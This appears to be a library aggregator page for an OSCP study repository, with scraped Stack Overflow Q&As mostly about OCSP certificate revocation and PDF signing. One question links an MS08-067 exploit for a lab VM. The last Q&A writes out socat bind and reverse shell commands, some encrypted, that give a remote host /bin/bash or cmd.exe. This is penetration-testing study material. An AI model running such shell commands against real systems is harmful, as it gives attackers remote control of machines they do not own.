OSCP | Collection of things made during my OSCP journey | Hacking library
kandi X-RAY | OSCP Summary
Hello world! This repo contains some of the scripts, exploits, and documents made during my OSCP journey. The list includes, but is not limited to, the following:
Trending Discussions on OSCP
QUESTION
My buddy sent me a screenshot of a question he was stuck on for an assessment and asked if I was able to help. So I took a shot at it and it's been two days now and this is haunting my dreams.
Question: "create a function named first_word that takes in a string and returns the first word."
Given Code:
...ANSWER
Answered 2022-Mar-12 at 01:19
You have the right basic idea here:
QUESTION
Context: Running an exploit vs a vulnerable VM as a part of my OSCP studies. I know this VM is vulnerable to this exploit because I ran the exploit inside MSF(pentesting framework) and it worked, but doing it manually I am having dependency issues.
Setup: I am on kali, latest quarterly release
Exploit: https://github.com/andyacer/ms08_067
Trying to install dependencies
Keep in mind on kali "python" points to python2.7.18, and python3 points to python3.xwhatever because of backwards compatibility (funny huh) because tons of exploits are written in python2
the script uses #!/usr/bin/env python
thus points to python2.7.18
I have already tried various solutions from various SO threads as well as articles on google.
...ANSWER
Answered 2021-Oct-18 at 05:12
Can you please check under /usr/local/lib that you have some version of python2 installed?
You should also be able to run python2 -V to verify that you do have python2 installed.
To install pip for python2, download get-pip.py from here and then run this command:
QUESTION
The first image is from a pdf signature which is LTV enabled. This document is not created by me.
In the revocation information, it shows the following text:
The selected certificate is considered valid because it has not been revoked as verified using the Online Certificate Status Protocol (OCSP) response that was embedded in the signature.
I do sign a pdf document using iText and I also apply an OCSP.
...ANSWER
Answered 2021-Apr-28 at 15:57
You add one OCSP response, the one you retrieve here:
QUESTION
How do I make a simple request for certificate revocation status to an EJBCA OCSP Responder using the Python requests library?
Example:
...ANSWER
Answered 2020-Nov-01 at 13:49
Basically it involves the following steps:
- retrieve the corresponding cert for a hostname
- if a corresponding entry is contained in the certificate, you can query the extensions via AuthorityInformationAccessOID.CA_ISSUERS, which will provide you with a link to the issuer certificate if successful
- retrieve the issuer cert with this link
- similarly you get via AuthorityInformationAccessOID.OCSP the corresponding OCSP server
- with this information about the current cert, the issuer_cert and the ocsp server you can feed OCSPRequestBuilder to create an OCSP request
- use requests.get to get the OCSP response
- from the OCSP response retrieve the certificate_status
To retrieve a cert for a hostname and port, you can use this fine answer: https://stackoverflow.com/a/49132495. The OCSP handling in Python is documented here: https://cryptography.io/en/latest/x509/ocsp/.
Code
If you convert the above points into a self-contained example, it looks something like this:
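The six steps of this answer as one runnable Python example; this is added code, not the answer's own (which is cut off above). It builds a constructed throwaway CA and leaf certificate so it runs offline, and replaces the HTTP round trip to the responder with a local stand-in that signs the response with the same demo CA; OCSP_URL is a placeholder, not a real responder.

```python
import datetime
from cryptography import x509
from cryptography.x509 import ocsp
from cryptography.x509.oid import NameOID, AuthorityInformationAccessOID
from cryptography.hazmat.primitives import hashes, serialization
from cryptography.hazmat.primitives.asymmetric import ec

OCSP_URL = "http://ocsp.example.test/ocsp"  # constructed placeholder, not a real responder
def make_cert(subject, issuer, pubkey, signing_key, ca=False, aia=None):
    # Throwaway certificate for the demo chain (constructed, not a real CA).
    now = datetime.datetime.now(datetime.timezone.utc)
    b = (x509.CertificateBuilder().subject_name(subject).issuer_name(issuer)
         .public_key(pubkey).serial_number(x509.random_serial_number())
         .not_valid_before(now).not_valid_after(now + datetime.timedelta(days=1))
         .add_extension(x509.BasicConstraints(ca=ca, path_length=None), critical=True))
    if aia is not None:
        b = b.add_extension(aia, critical=False)
    return b.sign(signing_key, hashes.SHA256())

CA_KEY = ec.generate_private_key(ec.SECP256R1())
CA_NAME = x509.Name([x509.NameAttribute(NameOID.COMMON_NAME, "Demo OCSP CA")])
CA_CERT = make_cert(CA_NAME, CA_NAME, CA_KEY.public_key(), CA_KEY, ca=True)
LEAF_CERT = make_cert(
    x509.Name([x509.NameAttribute(NameOID.COMMON_NAME, "leaf.example.test")]), CA_NAME,
    ec.generate_private_key(ec.SECP256R1()).public_key(), CA_KEY,
    aia=x509.AuthorityInformationAccess([x509.AccessDescription(
        AuthorityInformationAccessOID.OCSP, x509.UniformResourceIdentifier(OCSP_URL))]))

def ocsp_url_from(cert):  # the AuthorityInformationAccessOID.OCSP step of the answer
    aia = cert.extensions.get_extension_for_class(x509.AuthorityInformationAccess).value
    return next((d.access_location.value for d in aia
                 if d.access_method == AuthorityInformationAccessOID.OCSP), None)

def build_request(cert, issuer):  # OCSPRequestBuilder step; DER body sent to the responder
    req = ocsp.OCSPRequestBuilder().add_certificate(cert, issuer, hashes.SHA1()).build()
    return req.public_bytes(serialization.Encoding.DER)

def local_responder(request_der):
    # Stands in for the HTTP round trip: the demo CA signs 'good', rejecting unknown serials.
    req = ocsp.load_der_ocsp_request(request_der)
    if req.serial_number != LEAF_CERT.serial_number:
        raise ValueError("request is for an unknown serial")
    now = datetime.datetime.now(datetime.timezone.utc)
    resp = (ocsp.OCSPResponseBuilder()
            .add_response(LEAF_CERT, CA_CERT, hashes.SHA1(), ocsp.OCSPCertStatus.GOOD,
                          now, now + datetime.timedelta(hours=1), None, None)
            .responder_id(ocsp.OCSPResponderEncoding.HASH, CA_CERT)
            .sign(CA_KEY, hashes.SHA256()))
    return resp.public_bytes(serialization.Encoding.DER)

def check_status(response_der):  # the certificate_status step of the answer
    resp = ocsp.load_der_ocsp_response(response_der)
    return resp.response_status, resp.certificate_status
```

Against a real responder, the DER from build_request is what goes over HTTP to the URL returned by ocsp_url_from, and the bytes that come back go to check_status.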
QUESTION
I have a certificate that does not have an OCSP responder URL and it has 3 CRL endpoints configured. The first url only works from within my corporate network, the second and third can be accessed from outside.
The issue is when I do a chain.Build() on my certificate on a .net core 3.1 service, running on an Alpine base image in AKS cluster, it returns false with the chain element's status as "Unable to get certificate CRL". Since my pods are not on corpNet anyway, I would expect the chain.Build() to somehow do a round-robin on the endpoints but I am not sure how it actually works.
Is there a way we can hit the other endpoints and get the CRLS?
...ANSWER
Answered 2020-Sep-02 at 19:31
No, the Linux implementation of X509Chain only tries the first HTTP endpoint for a CRL distribution point.
QUESTION
I am digitally signing a PDF with iText7 and GlobalSign DSS. I implemented the GlobalSign DSS API calls into the necessary iText classes. I get the proper server responses and I am able to call the pdfSigner.signDetached() method with all the needed arguments. Signing with the pdfSigner also succeeds and I get a signed PDF that looks good at first sight. But when I open the signed pdf in Adobe Reader it tells me that the trust chain of the signing certificate is broken and that it can not trace it back to the CA root. Which is strange because it is an AATL certificate and the AATL list of the Adobe Reader is up to date.
And I do not understand why this is happening.
This is what I do:
- call DSS for an identity: returns an id string, the signing certificate and an ocsp response
- call DSS for the trustchain: returns the chain of certificates used to sign the signing certificate, up to the GlobalSign root, together with their ocsp responses (except for the root)
- I create an array of X509Certificate objects containing the signing certificate, 2 intermediates and the GlobalSign root certificate (in that order)
- I implement an IOcspClient that uses the ocsp response from the DSS call for the identity
- I implement an ITsaClient that calls the DSS API /timestamp/{digest}
- and finally I execute: pdfSigner.signDetached(externalDigest, externalSignature, chain.toArray(new X509Certificate[]{}), null, dssOcspClient, dssTSAClient, 0, PdfSigner.CryptoStandard.CMS);
in which the externalSignature (an implementation of IExternalSignature) will call the DSS identity/{id}/sign/{digest} API
While debugging into the signDetached method and deeper into the pdfSigner code, I clearly see that all certificates are in the chain in the right order. I see them being processed in the PdfPKCS7 class (however I don't know/understand exactly what is going on there). I see the signing taking place, no exceptions are thrown and at the end the produced PDF looks like it is correctly signed. Which Adobe says is not.
What am I missing here?
The trustchain response from the DSS API not only returns the certificates from the chain of trust of the signing certificate, but also the ocsp responses for the two intermediates between the signing certificate and the GlobalSign root. These are never used. And in fact I don't know what to do with them either.
Could these be the missing pieces for Adobe Reader to reconstruct the trust chain up to the GlobalSign root?
And if so: how do I put them into that PDF?
And if not: then what am I doing wrong that breaks that trustchain?
An answer to these questions would save my day :-)
Here is the link to a PDF that will show the problem :
test pdf signed with DSS
(after accepting the answer, I removed the example pdf on my client's request)
Below are some pieces of the code.
The center piece that gathers the DSS info and calls the signDetached method
ANSWER
Answered 2020-Apr-08 at 14:14
Your signer certificate is invalid.
In detail
Your signer certificate and its certificate chain (according to issuer/subject match) are embedded in the signature, in particular your certificate with subject
cn=Homologatie Voertuigen, ou=Departement Mobiliteit en Openbare Werken, ou=Vlaams Huis voor de Verkeersveiligheid, o=Ministeries van de Vlaamse Gemeenschap, l=Brussel, st=Brussel, c=BE
and its claimed issuer
cn=GlobalSign CA 5 for AATL, o=GlobalSign nv-sa, c=BE
Thus, one can check the signature with which your certificate is signed. And while doing so one sees that the TBSCertificate
part of your signer certificate (the to-be-signed part) has this digest value
QUESTION
I'm trying to learn about certificate and CRL handling, so I created the following example certificate chain:
Root CA (self-signed) → Intermediate CA (signed by Root CA) → Server Cert (signed by Intermediate CA)
Now I would like to test certificate revocation to be effective. To do so, I revoke the Server Cert and create a CRL file (of the Intermediate CA) accordingly. The X509v3 CRL Distribution Points are present in all of the certificate files, and they are accessible via http, like:
...ANSWER
Answered 2020-Mar-20 at 18:16
Indeed there were mainly two mistakes I had made:
- The CRL file mandatorily has to be in DER format, which I did not know. (Conversion from the PEM format is simple: openssl crl -in ${crlFile}.pem -outform DER -out ${crlFile} )
- Of course, a certificate's CRL distribution point has to be the one of its parent CA. (So, e.g. for my intermediate CA, it must be the one of the root CA.)
Keeping this in mind and also chaining the intermediate CA certs to the server certs, as dave_thompson_085s very helpful comments suggested, the original command
QUESTION
Hey guys I need your help here!
I recently upgraded my OSCP material to get the new OSCP version 2020 and I came across the chapter with socat to create encrypted bind shell/reverse shell.
I thought I understood how to use it, but my attempts to send an encrypted reverse shell from my windows machine to my Kali machine have been unsuccessful.
I decided to do some trials and error with an unencrypted bind shell on both sides.
Here is what worked for me:
- Kali Bind Shell (Getting /bin/bash on Windows by connecting to the kali binded shell socket)
- Kali Reverse Shell (Getting /bin/bash on Windows by sending it to the windows listening socket)
Here's what did not work for me:
- Windows Bind Shell (Getting cmd.exe by connecting to the windows listening shell socket)
- Windows Reverse Shell (Getting cmd.exe by sending it to the Kali listening socket)
Here is what I did:
Kali Bind Shell - OK
Kali (192.168.119.145)
socat -d -d -d TCP4-LISTEN:4444,fork EXEC:/bin/bash
Windows 10 (192.168.145.10)
socat -d -d -d - TCP4:192.168.119.145:4444
Kali Reverse Shell - OK
Windows 10 (192.168.145.10)
socat -d -d -d TCP4-LISTEN:4444,fork STDOUT
Kali (192.168.119.145)
socat -d -d -d TCP4:192.168.145.10:4444 EXEC:/bin/bash
Windows Bind Shell - NOT OK
Windows 10 (192.168.145.10)
socat -d -d -d TCP4-LISTEN:4444,fork EXEC:cmd.exe
Kali (192.168.119.145)
socat -d -d -d - TCP4:192.168.145.10:4444
Windows Reverse Shell - NOT OK
Kali (192.168.119.145)
socat -d -d -d TCP4-LISTEN:4444,fork STDOUT
Windows 10 (192.168.145.10)
socat -d -d -d TCP4:192.168.119.145:4444 EXEC:cmd.exe
Here is what I get:
Windows bind shell - Windows Machine
...ANSWER
Answered 2020-Feb-19 at 13:38
Windows machine (copy the .pem file from kali):
socat OPENSSL-LISTEN:443,cert=bind_shell.pem,verify=0 STDOUT
Kali machine:
socat OPENSSL:192.168.X.X:443,verify=0 EXEC:/bin/bash
Community Discussions, Code Snippets contain sources that include Stack Exchange Network
Install OSCP
You can use OSCP like any standard Python library. You will need to make sure that you have a development environment consisting of a Python distribution including header files, a compiler, pip, and git installed. Make sure that your pip, setuptools, and wheel are up to date. When using pip it is generally recommended to install packages in a virtual environment to avoid changes to the system.